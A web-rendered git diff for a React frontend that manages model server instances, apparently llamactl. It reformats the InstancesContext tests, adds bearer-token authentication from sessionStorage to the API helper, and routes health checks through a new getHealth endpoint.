data-testid="update-instance"
|
||||
>
|
||||
Update Instance
|
||||
</button>
|
||||
<button
|
||||
onClick={() => startInstance('instance2')}
|
||||
<button
|
||||
onClick={() => startInstance("instance2")}
|
||||
data-testid="start-instance"
|
||||
>
|
||||
Start Instance2
|
||||
</button>
|
||||
<button
|
||||
onClick={() => stopInstance('instance1')}
|
||||
<button
|
||||
onClick={() => stopInstance("instance1")}
|
||||
data-testid="stop-instance"
|
||||
>
|
||||
Stop Instance1
|
||||
</button>
|
||||
<button
|
||||
onClick={() => restartInstance('instance1')}
|
||||
<button
|
||||
onClick={() => restartInstance("instance1")}
|
||||
data-testid="restart-instance"
|
||||
>
|
||||
Restart Instance1
|
||||
</button>
|
||||
<button
|
||||
onClick={() => deleteInstance('instance2')}
|
||||
<button
|
||||
onClick={() => deleteInstance("instance2")}
|
||||
data-testid="delete-instance"
|
||||
>
|
||||
Delete Instance2
|
||||
</button>
|
||||
<button
|
||||
onClick={clearError}
|
||||
data-testid="clear-error"
|
||||
>
|
||||
<button onClick={clearError} data-testid="clear-error">
|
||||
Clear Error
|
||||
</button>
|
||||
</div>
|
||||
)
|
||||
);
|
||||
}
|
||||
|
||||
function renderWithProvider(children: ReactNode) {
|
||||
return render(
|
||||
<InstancesProvider>
|
||||
{children}
|
||||
</InstancesProvider>
|
||||
)
|
||||
<AuthProvider>
|
||||
<InstancesProvider>{children}</InstancesProvider>
|
||||
</AuthProvider>
|
||||
);
|
||||
}
|
||||
|
||||
describe('InstancesContext', () => {
|
||||
describe("InstancesContext", () => {
|
||||
const mockInstances: Instance[] = [
|
||||
{ name: 'instance1', running: true, options: { model: 'model1.gguf' } },
|
||||
{ name: 'instance2', running: false, options: { model: 'model2.gguf' } }
|
||||
]
|
||||
{ name: "instance1", running: true, options: { model: "model1.gguf" } },
|
||||
{ name: "instance2", running: false, options: { model: "model2.gguf" } },
|
||||
];
|
||||
|
||||
beforeEach(() => {
|
||||
vi.clearAllMocks()
|
||||
vi.clearAllMocks();
|
||||
window.sessionStorage.setItem('llamactl_management_key', 'test-api-key-123');
|
||||
global.fetch = vi.fn(() => Promise.resolve(new Response(null, { status: 200 })));
|
||||
// Default successful API responses
|
||||
vi.mocked(instancesApi.list).mockResolvedValue(mockInstances)
|
||||
})
|
||||
vi.mocked(instancesApi.list).mockResolvedValue(mockInstances);
|
||||
});
|
||||
|
||||
afterEach(() => {
|
||||
vi.clearAllMocks()
|
||||
})
|
||||
vi.restoreAllMocks();
|
||||
});
|
||||
|
||||
describe('Initial Loading', () => {
|
||||
it('loads instances on mount', async () => {
|
||||
renderWithProvider(<TestComponent />)
|
||||
describe("Initial Loading", () => {
|
||||
it("loads instances on mount", async () => {
|
||||
renderWithProvider(<TestComponent />);
|
||||
|
||||
// Should start loading
|
||||
expect(screen.getByTestId('loading')).toHaveTextContent('true')
|
||||
|
||||
expect(screen.getByTestId("loading")).toHaveTextContent("true");
|
||||
|
||||
// Should fetch instances
|
||||
await waitFor(() => {
|
||||
expect(instancesApi.list).toHaveBeenCalledOnce()
|
||||
})
|
||||
expect(instancesApi.list).toHaveBeenCalledOnce();
|
||||
});
|
||||
|
||||
// Should display loaded instances
|
||||
await waitFor(() => {
|
||||
expect(screen.getByTestId('loading')).toHaveTextContent('false')
|
||||
expect(screen.getByTestId('instances-count')).toHaveTextContent('2')
|
||||
expect(screen.getByTestId('instance-instance1')).toHaveTextContent('instance1:true')
|
||||
expect(screen.getByTestId('instance-instance2')).toHaveTextContent('instance2:false')
|
||||
})
|
||||
})
|
||||
expect(screen.getByTestId("loading")).toHaveTextContent("false");
|
||||
expect(screen.getByTestId("instances-count")).toHaveTextContent("2");
|
||||
expect(screen.getByTestId("instance-instance1")).toHaveTextContent(
|
||||
"instance1:true"
|
||||
);
|
||||
expect(screen.getByTestId("instance-instance2")).toHaveTextContent(
|
||||
"instance2:false"
|
||||
);
|
||||
});
|
||||
});
|
||||
|
||||
it('handles API error during initial load', async () => {
|
||||
const errorMessage = 'Network error'
|
||||
vi.mocked(instancesApi.list).mockRejectedValue(new Error(errorMessage))
|
||||
it("handles API error during initial load", async () => {
|
||||
const errorMessage = "Network error";
|
||||
vi.mocked(instancesApi.list).mockRejectedValue(new Error(errorMessage));
|
||||
|
||||
renderWithProvider(<TestComponent />)
|
||||
renderWithProvider(<TestComponent />);
|
||||
|
||||
await waitFor(() => {
|
||||
expect(screen.getByTestId('loading')).toHaveTextContent('false')
|
||||
expect(screen.getByTestId('error')).toHaveTextContent(errorMessage)
|
||||
expect(screen.getByTestId('instances-count')).toHaveTextContent('0')
|
||||
})
|
||||
})
|
||||
})
|
||||
expect(screen.getByTestId("loading")).toHaveTextContent("false");
|
||||
expect(screen.getByTestId("error")).toHaveTextContent(errorMessage);
|
||||
expect(screen.getByTestId("instances-count")).toHaveTextContent("0");
|
||||
});
|
||||
});
|
||||
});
|
||||
|
||||
describe('Create Instance', () => {
|
||||
it('creates instance and adds it to state', async () => {
|
||||
const newInstance: Instance = {
|
||||
name: 'new-instance',
|
||||
running: false,
|
||||
options: { model: 'test.gguf' }
|
||||
}
|
||||
vi.mocked(instancesApi.create).mockResolvedValue(newInstance)
|
||||
describe("Create Instance", () => {
|
||||
it("creates instance and adds it to state", async () => {
|
||||
const newInstance: Instance = {
|
||||
name: "new-instance",
|
||||
running: false,
|
||||
options: { model: "test.gguf" },
|
||||
};
|
||||
vi.mocked(instancesApi.create).mockResolvedValue(newInstance);
|
||||
|
||||
renderWithProvider(<TestComponent />)
|
||||
renderWithProvider(<TestComponent />);
|
||||
|
||||
await waitFor(() => {
|
||||
expect(screen.getByTestId('loading')).toHaveTextContent('false')
|
||||
expect(screen.getByTestId('instances-count')).toHaveTextContent('2')
|
||||
})
|
||||
expect(screen.getByTestId("loading")).toHaveTextContent("false");
|
||||
expect(screen.getByTestId("instances-count")).toHaveTextContent("2");
|
||||
});
|
||||
|
||||
screen.getByTestId('create-instance').click()
|
||||
screen.getByTestId("create-instance").click();
|
||||
|
||||
await waitFor(() => {
|
||||
expect(instancesApi.create).toHaveBeenCalledWith('new-instance', { model: 'test.gguf' })
|
||||
})
|
||||
expect(instancesApi.create).toHaveBeenCalledWith("new-instance", {
|
||||
model: "test.gguf",
|
||||
});
|
||||
});
|
||||
|
||||
await waitFor(() => {
|
||||
expect(screen.getByTestId('instances-count')).toHaveTextContent('3')
|
||||
expect(screen.getByTestId('instance-new-instance')).toHaveTextContent('new-instance:false')
|
||||
})
|
||||
})
|
||||
expect(screen.getByTestId("instances-count")).toHaveTextContent("3");
|
||||
expect(screen.getByTestId("instance-new-instance")).toHaveTextContent(
|
||||
"new-instance:false"
|
||||
);
|
||||
});
|
||||
});
|
||||
|
||||
it('handles create instance error without changing state', async () => {
|
||||
const errorMessage = 'Instance already exists'
|
||||
vi.mocked(instancesApi.create).mockRejectedValue(new Error(errorMessage))
|
||||
it("handles create instance error without changing state", async () => {
|
||||
const errorMessage = "Instance already exists";
|
||||
vi.mocked(instancesApi.create).mockRejectedValue(new Error(errorMessage));
|
||||
|
||||
renderWithProvider(<TestComponent />)
|
||||
renderWithProvider(<TestComponent />);
|
||||
|
||||
await waitFor(() => {
|
||||
expect(screen.getByTestId('loading')).toHaveTextContent('false')
|
||||
expect(screen.getByTestId('instances-count')).toHaveTextContent('2')
|
||||
})
|
||||
expect(screen.getByTestId("loading")).toHaveTextContent("false");
|
||||
expect(screen.getByTestId("instances-count")).toHaveTextContent("2");
|
||||
});
|
||||
|
||||
screen.getByTestId('create-instance').click()
|
||||
screen.getByTestId("create-instance").click();
|
||||
|
||||
await waitFor(() => {
|
||||
expect(screen.getByTestId('error')).toHaveTextContent(errorMessage)
|
||||
})
|
||||
expect(screen.getByTestId("error")).toHaveTextContent(errorMessage);
|
||||
});
|
||||
|
||||
expect(screen.getByTestId('instances-count')).toHaveTextContent('2')
|
||||
expect(screen.queryByTestId('instance-new-instance')).not.toBeInTheDocument()
|
||||
})
|
||||
})
|
||||
expect(screen.getByTestId("instances-count")).toHaveTextContent("2");
|
||||
expect(
|
||||
screen.queryByTestId("instance-new-instance")
|
||||
).not.toBeInTheDocument();
|
||||
});
|
||||
});
|
||||
|
||||
describe('Update Instance', () => {
|
||||
it('updates instance and maintains it in state', async () => {
|
||||
const updatedInstance: Instance = {
|
||||
name: 'instance1',
|
||||
running: true,
|
||||
options: { model: 'updated.gguf' }
|
||||
}
|
||||
vi.mocked(instancesApi.update).mockResolvedValue(updatedInstance)
|
||||
describe("Update Instance", () => {
|
||||
it("updates instance and maintains it in state", async () => {
|
||||
const updatedInstance: Instance = {
|
||||
name: "instance1",
|
||||
running: true,
|
||||
options: { model: "updated.gguf" },
|
||||
};
|
||||
vi.mocked(instancesApi.update).mockResolvedValue(updatedInstance);
|
||||
|
||||
renderWithProvider(<TestComponent />)
|
||||
renderWithProvider(<TestComponent />);
|
||||
|
||||
await waitFor(() => {
|
||||
expect(screen.getByTestId('loading')).toHaveTextContent('false')
|
||||
expect(screen.getByTestId('instances-count')).toHaveTextContent('2')
|
||||
})
|
||||
expect(screen.getByTestId("loading")).toHaveTextContent("false");
|
||||
expect(screen.getByTestId("instances-count")).toHaveTextContent("2");
|
||||
});
|
||||
|
||||
screen.getByTestId('update-instance').click()
|
||||
screen.getByTestId("update-instance").click();
|
||||
|
||||
await waitFor(() => {
|
||||
expect(instancesApi.update).toHaveBeenCalledWith('instance1', { model: 'updated.gguf' })
|
||||
})
|
||||
expect(instancesApi.update).toHaveBeenCalledWith("instance1", {
|
||||
model: "updated.gguf",
|
||||
});
|
||||
});
|
||||
|
||||
await waitFor(() => {
|
||||
expect(screen.getByTestId('instances-count')).toHaveTextContent('2')
|
||||
expect(screen.getByTestId('instance-instance1')).toBeInTheDocument()
|
||||
})
|
||||
})
|
||||
})
|
||||
expect(screen.getByTestId("instances-count")).toHaveTextContent("2");
|
||||
expect(screen.getByTestId("instance-instance1")).toBeInTheDocument();
|
||||
});
|
||||
});
|
||||
});
|
||||
|
||||
describe('Start/Stop Instance', () => {
|
||||
it('starts existing instance and updates its running state', async () => {
|
||||
vi.mocked(instancesApi.start).mockResolvedValue({} as Instance)
|
||||
describe("Start/Stop Instance", () => {
|
||||
it("starts existing instance and updates its running state", async () => {
|
||||
vi.mocked(instancesApi.start).mockResolvedValue({} as Instance);
|
||||
|
||||
renderWithProvider(<TestComponent />)
|
||||
renderWithProvider(<TestComponent />);
|
||||
|
||||
await waitFor(() => {
|
||||
expect(screen.getByTestId('loading')).toHaveTextContent('false')
|
||||
expect(screen.getByTestId("loading")).toHaveTextContent("false");
|
||||
// instance2 starts as not running
|
||||
expect(screen.getByTestId('instance-instance2')).toHaveTextContent('instance2:false')
|
||||
})
|
||||
expect(screen.getByTestId("instance-instance2")).toHaveTextContent(
|
||||
"instance2:false"
|
||||
);
|
||||
});
|
||||
|
||||
// Start instance2 (button already configured to start instance2)
|
||||
screen.getByTestId('start-instance').click()
|
||||
screen.getByTestId("start-instance").click();
|
||||
|
||||
await waitFor(() => {
|
||||
expect(instancesApi.start).toHaveBeenCalledWith('instance2')
|
||||
expect(instancesApi.start).toHaveBeenCalledWith("instance2");
|
||||
// The running state should be updated to true
|
||||
expect(screen.getByTestId('instance-instance2')).toHaveTextContent('instance2:true')
|
||||
})
|
||||
})
|
||||
expect(screen.getByTestId("instance-instance2")).toHaveTextContent(
|
||||
"instance2:true"
|
||||
);
|
||||
});
|
||||
});
|
||||
|
||||
it('stops instance and updates running state to false', async () => {
|
||||
vi.mocked(instancesApi.stop).mockResolvedValue({} as Instance)
|
||||
it("stops instance and updates running state to false", async () => {
|
||||
vi.mocked(instancesApi.stop).mockResolvedValue({} as Instance);
|
||||
|
||||
renderWithProvider(<TestComponent />)
|
||||
renderWithProvider(<TestComponent />);
|
||||
|
||||
await waitFor(() => {
|
||||
expect(screen.getByTestId('loading')).toHaveTextContent('false')
|
||||
expect(screen.getByTestId("loading")).toHaveTextContent("false");
|
||||
// instance1 starts as running
|
||||
expect(screen.getByTestId('instance-instance1')).toHaveTextContent('instance1:true')
|
||||
})
|
||||
expect(screen.getByTestId("instance-instance1")).toHaveTextContent(
|
||||
"instance1:true"
|
||||
);
|
||||
});
|
||||
|
||||
// Stop instance1 (button already configured to stop instance1)
|
||||
screen.getByTestId('stop-instance').click()
|
||||
screen.getByTestId("stop-instance").click();
|
||||
|
||||
await waitFor(() => {
|
||||
expect(instancesApi.stop).toHaveBeenCalledWith('instance1')
|
||||
expect(instancesApi.stop).toHaveBeenCalledWith("instance1");
|
||||
// The running state should be updated to false
|
||||
expect(screen.getByTestId('instance-instance1')).toHaveTextContent('instance1:false')
|
||||
})
|
||||
})
|
||||
expect(screen.getByTestId("instance-instance1")).toHaveTextContent(
|
||||
"instance1:false"
|
||||
);
|
||||
});
|
||||
});
|
||||
|
||||
it('handles start instance error', async () => {
|
||||
const errorMessage = 'Failed to start instance'
|
||||
vi.mocked(instancesApi.start).mockRejectedValue(new Error(errorMessage))
|
||||
it("handles start instance error", async () => {
|
||||
const errorMessage = "Failed to start instance";
|
||||
vi.mocked(instancesApi.start).mockRejectedValue(new Error(errorMessage));
|
||||
|
||||
renderWithProvider(<TestComponent />)
|
||||
renderWithProvider(<TestComponent />);
|
||||
|
||||
await waitFor(() => {
|
||||
expect(screen.getByTestId('loading')).toHaveTextContent('false')
|
||||
})
|
||||
expect(screen.getByTestId("loading")).toHaveTextContent("false");
|
||||
});
|
||||
|
||||
screen.getByTestId('start-instance').click()
|
||||
screen.getByTestId("start-instance").click();
|
||||
|
||||
await waitFor(() => {
|
||||
expect(screen.getByTestId('error')).toHaveTextContent(errorMessage)
|
||||
})
|
||||
})
|
||||
})
|
||||
expect(screen.getByTestId("error")).toHaveTextContent(errorMessage);
|
||||
});
|
||||
});
|
||||
});
|
||||
|
||||
describe('Delete Instance', () => {
|
||||
it('deletes instance and removes it from state', async () => {
|
||||
vi.mocked(instancesApi.delete).mockResolvedValue(undefined)
|
||||
describe("Delete Instance", () => {
|
||||
it("deletes instance and removes it from state", async () => {
|
||||
vi.mocked(instancesApi.delete).mockResolvedValue(undefined);
|
||||
|
||||
renderWithProvider(<TestComponent />)
|
||||
renderWithProvider(<TestComponent />);
|
||||
|
||||
await waitFor(() => {
|
||||
expect(screen.getByTestId('loading')).toHaveTextContent('false')
|
||||
expect(screen.getByTestId('instances-count')).toHaveTextContent('2')
|
||||
expect(screen.getByTestId('instance-instance2')).toBeInTheDocument()
|
||||
})
|
||||
expect(screen.getByTestId("loading")).toHaveTextContent("false");
|
||||
expect(screen.getByTestId("instances-count")).toHaveTextContent("2");
|
||||
expect(screen.getByTestId("instance-instance2")).toBeInTheDocument();
|
||||
});
|
||||
|
||||
screen.getByTestId('delete-instance').click()
|
||||
screen.getByTestId("delete-instance").click();
|
||||
|
||||
await waitFor(() => {
|
||||
expect(instancesApi.delete).toHaveBeenCalledWith('instance2')
|
||||
})
|
||||
expect(instancesApi.delete).toHaveBeenCalledWith("instance2");
|
||||
});
|
||||
|
||||
await waitFor(() => {
|
||||
expect(screen.getByTestId('instances-count')).toHaveTextContent('1')
|
||||
expect(screen.queryByTestId('instance-instance2')).not.toBeInTheDocument()
|
||||
expect(screen.getByTestId('instance-instance1')).toBeInTheDocument() // instance1 should still exist
|
||||
})
|
||||
})
|
||||
expect(screen.getByTestId("instances-count")).toHaveTextContent("1");
|
||||
expect(
|
||||
screen.queryByTestId("instance-instance2")
|
||||
).not.toBeInTheDocument();
|
||||
expect(screen.getByTestId("instance-instance1")).toBeInTheDocument(); // instance1 should still exist
|
||||
});
|
||||
});
|
||||
|
||||
it('handles delete instance error without changing state', async () => {
|
||||
const errorMessage = 'Instance is running'
|
||||
vi.mocked(instancesApi.delete).mockRejectedValue(new Error(errorMessage))
|
||||
it("handles delete instance error without changing state", async () => {
|
||||
const errorMessage = "Instance is running";
|
||||
vi.mocked(instancesApi.delete).mockRejectedValue(new Error(errorMessage));
|
||||
|
||||
renderWithProvider(<TestComponent />)
|
||||
renderWithProvider(<TestComponent />);
|
||||
|
||||
await waitFor(() => {
|
||||
expect(screen.getByTestId('loading')).toHaveTextContent('false')
|
||||
expect(screen.getByTestId('instances-count')).toHaveTextContent('2')
|
||||
})
|
||||
expect(screen.getByTestId("loading")).toHaveTextContent("false");
|
||||
expect(screen.getByTestId("instances-count")).toHaveTextContent("2");
|
||||
});
|
||||
|
||||
screen.getByTestId('delete-instance').click()
|
||||
screen.getByTestId("delete-instance").click();
|
||||
|
||||
await waitFor(() => {
|
||||
expect(screen.getByTestId('error')).toHaveTextContent(errorMessage)
|
||||
})
|
||||
expect(screen.getByTestId("error")).toHaveTextContent(errorMessage);
|
||||
});
|
||||
|
||||
expect(screen.getByTestId('instances-count')).toHaveTextContent('2')
|
||||
expect(screen.getByTestId('instance-instance2')).toBeInTheDocument()
|
||||
})
|
||||
})
|
||||
expect(screen.getByTestId("instances-count")).toHaveTextContent("2");
|
||||
expect(screen.getByTestId("instance-instance2")).toBeInTheDocument();
|
||||
});
|
||||
});
|
||||
|
||||
describe('Error Management', () => {
|
||||
it('clears error when clearError is called', async () => {
|
||||
const errorMessage = 'Test error'
|
||||
vi.mocked(instancesApi.list).mockRejectedValue(new Error(errorMessage))
|
||||
describe("Error Management", () => {
|
||||
it("clears error when clearError is called", async () => {
|
||||
const errorMessage = "Test error";
|
||||
vi.mocked(instancesApi.list).mockRejectedValue(new Error(errorMessage));
|
||||
|
||||
renderWithProvider(<TestComponent />)
|
||||
renderWithProvider(<TestComponent />);
|
||||
|
||||
await waitFor(() => {
|
||||
expect(screen.getByTestId('error')).toHaveTextContent(errorMessage)
|
||||
})
|
||||
expect(screen.getByTestId("error")).toHaveTextContent(errorMessage);
|
||||
});
|
||||
|
||||
screen.getByTestId('clear-error').click()
|
||||
screen.getByTestId("clear-error").click();
|
||||
|
||||
await waitFor(() => {
|
||||
expect(screen.getByTestId('error')).toHaveTextContent('no-error')
|
||||
})
|
||||
})
|
||||
})
|
||||
expect(screen.getByTestId("error")).toHaveTextContent("no-error");
|
||||
});
|
||||
});
|
||||
});
|
||||
|
||||
describe('State Consistency', () => {
|
||||
it('maintains consistent state during multiple operations', async () => {
|
||||
describe("State Consistency", () => {
|
||||
it("maintains consistent state during multiple operations", async () => {
|
||||
// Test that operations don't interfere with each other
|
||||
const newInstance: Instance = {
|
||||
name: 'new-instance',
|
||||
running: false,
|
||||
options: {}
|
||||
}
|
||||
vi.mocked(instancesApi.create).mockResolvedValue(newInstance)
|
||||
vi.mocked(instancesApi.start).mockResolvedValue({} as Instance)
|
||||
const newInstance: Instance = {
|
||||
name: "new-instance",
|
||||
running: false,
|
||||
options: {},
|
||||
};
|
||||
vi.mocked(instancesApi.create).mockResolvedValue(newInstance);
|
||||
vi.mocked(instancesApi.start).mockResolvedValue({} as Instance);
|
||||
|
||||
renderWithProvider(<TestComponent />)
|
||||
renderWithProvider(<TestComponent />);
|
||||
|
||||
await waitFor(() => {
|
||||
expect(screen.getByTestId('loading')).toHaveTextContent('false')
|
||||
expect(screen.getByTestId('instances-count')).toHaveTextContent('2')
|
||||
})
|
||||
expect(screen.getByTestId("loading")).toHaveTextContent("false");
|
||||
expect(screen.getByTestId("instances-count")).toHaveTextContent("2");
|
||||
});
|
||||
|
||||
// Create new instance
|
||||
screen.getByTestId('create-instance').click()
|
||||
screen.getByTestId("create-instance").click();
|
||||
|
||||
await waitFor(() => {
|
||||
expect(screen.getByTestId('instances-count')).toHaveTextContent('3')
|
||||
})
|
||||
expect(screen.getByTestId("instances-count")).toHaveTextContent("3");
|
||||
});
|
||||
|
||||
// Start an instance (this should not affect the count)
|
||||
screen.getByTestId('start-instance').click()
|
||||
screen.getByTestId("start-instance").click();
|
||||
|
||||
await waitFor(() => {
|
||||
expect(instancesApi.start).toHaveBeenCalled()
|
||||
expect(screen.getByTestId('instances-count')).toHaveTextContent('3') // Still 3
|
||||
expect(instancesApi.start).toHaveBeenCalled();
|
||||
expect(screen.getByTestId("instances-count")).toHaveTextContent("3"); // Still 3
|
||||
// But the running state should change
|
||||
expect(screen.getByTestId('instance-instance2')).toHaveTextContent('instance2:true')
|
||||
})
|
||||
})
|
||||
})
|
||||
})
|
||||
expect(screen.getByTestId("instance-instance2")).toHaveTextContent(
|
||||
"instance2:true"
|
||||
);
|
||||
});
|
||||
});
|
||||
});
|
||||
});
|
||||
|
||||
@@ -10,18 +10,31 @@ async function apiCall<T>(
|
||||
): Promise<T> {
|
||||
const url = `${API_BASE}${endpoint}`;
|
||||
|
||||
// Prepare headers
|
||||
const headers: HeadersInit = {
|
||||
// Get auth token from sessionStorage (same as AuthContext)
|
||||
const storedKey = sessionStorage.getItem('llamactl_management_key');
|
||||
|
||||
// Prepare headers with auth
|
||||
const headers: Record<string, string> = {
|
||||
"Content-Type": "application/json",
|
||||
...options.headers,
|
||||
...(options.headers as Record<string, string>),
|
||||
};
|
||||
|
||||
// Add auth header if available
|
||||
if (storedKey) {
|
||||
headers['Authorization'] = `Bearer ${storedKey}`;
|
||||
}
|
||||
|
||||
try {
|
||||
const response = await fetch(url, {
|
||||
...options,
|
||||
headers,
|
||||
});
|
||||
|
||||
// Handle authentication errors
|
||||
if (response.status === 401) {
|
||||
throw new Error('Authentication required');
|
||||
}
|
||||
|
||||
if (!response.ok) {
|
||||
// Try to get error message from response
|
||||
let errorMessage = `HTTP ${response.status}`;
|
||||
@@ -47,7 +60,7 @@ async function apiCall<T>(
|
||||
const text = await response.text();
|
||||
return text as T;
|
||||
} else {
|
||||
const data = await response.json();
|
||||
const data = await response.json() as T;
|
||||
return data;
|
||||
}
|
||||
} catch (error) {
|
||||
@@ -121,4 +134,7 @@ export const instancesApi = {
|
||||
const params = lines ? `?lines=${lines}` : "";
|
||||
return apiCall<string>(`/instances/${name}/logs${params}`, {}, "text");
|
||||
},
|
||||
|
||||
// GET /instances/{name}/proxy/health
|
||||
getHealth: (name: string) => apiCall<any>(`/instances/${name}/proxy/health`),
|
||||
};
|
||||
|
||||
@@ -1,4 +1,5 @@
|
||||
import { type HealthStatus } from '@/types/instance'
|
||||
import { instancesApi } from '@/lib/api'
|
||||
|
||||
type HealthCallback = (health: HealthStatus) => void
|
||||
|
||||
@@ -8,31 +9,33 @@ class HealthService {
|
||||
|
||||
async checkHealth(instanceName: string): Promise<HealthStatus> {
|
||||
try {
|
||||
const response = await fetch(`/api/v1/instances/${instanceName}/proxy/health`)
|
||||
await instancesApi.getHealth(instanceName)
|
||||
|
||||
if (response.status === 200) {
|
||||
return {
|
||||
status: 'ok',
|
||||
lastChecked: new Date()
|
||||
return {
|
||||
status: 'ok',
|
||||
lastChecked: new Date()
|
||||
}
|
||||
} catch (error) {
|
||||
if (error instanceof Error) {
|
||||
// Check if it's a 503 (service unavailable - loading)
|
||||
if (error.message.includes('503')) {
|
||||
return {
|
||||
status: 'loading',
|
||||
message: 'Instance is starting up',
|
||||
lastChecked: new Date()
|
||||
}
|
||||
}
|
||||
} else if (response.status === 503) {
|
||||
const data = await response.json()
|
||||
return {
|
||||
status: 'loading',
|
||||
message: data.error.message,
|
||||
lastChecked: new Date()
|
||||
}
|
||||
} else {
|
||||
|
||||
return {
|
||||
status: 'error',
|
||||
message: `HTTP ${response.status}`,
|
||||
message: error.message,
|
||||
lastChecked: new Date()
|
||||
}
|
||||
}
|
||||
} catch (error) {
|
||||
|
||||
return {
|
||||
status: 'error',
|
||||
message: 'Network error',
|
||||
message: 'Unknown error',
|
||||
lastChecked: new Date()
|
||||
}
|
||||
}
|
||||
@@ -82,7 +85,7 @@ class HealthService {
|
||||
}, 60000)
|
||||
|
||||
this.intervals.set(instanceName, interval)
|
||||
}, 2000)
|
||||
}, 5000)
|
||||
}
|
||||
|
||||
private stopHealthCheck(instanceName: string): void {
|
||||
|
||||
@@ -3,11 +3,14 @@ import ReactDOM from 'react-dom/client'
|
||||
import App from './App'
|
||||
import { InstancesProvider } from './contexts/InstancesContext'
|
||||
import './index.css'
|
||||
import { AuthProvider } from './contexts/AuthContext'
|
||||
|
||||
ReactDOM.createRoot(document.getElementById('root')!).render(
|
||||
<React.StrictMode>
|
||||
<InstancesProvider>
|
||||
<App />
|
||||
</InstancesProvider>
|
||||
<AuthProvider>
|
||||
<InstancesProvider>
|
||||
<App />
|
||||
</InstancesProvider>
|
||||
</AuthProvider>
|
||||
</React.StrictMode>,
|
||||
)
|
||||
Reference in New Issue
Block a user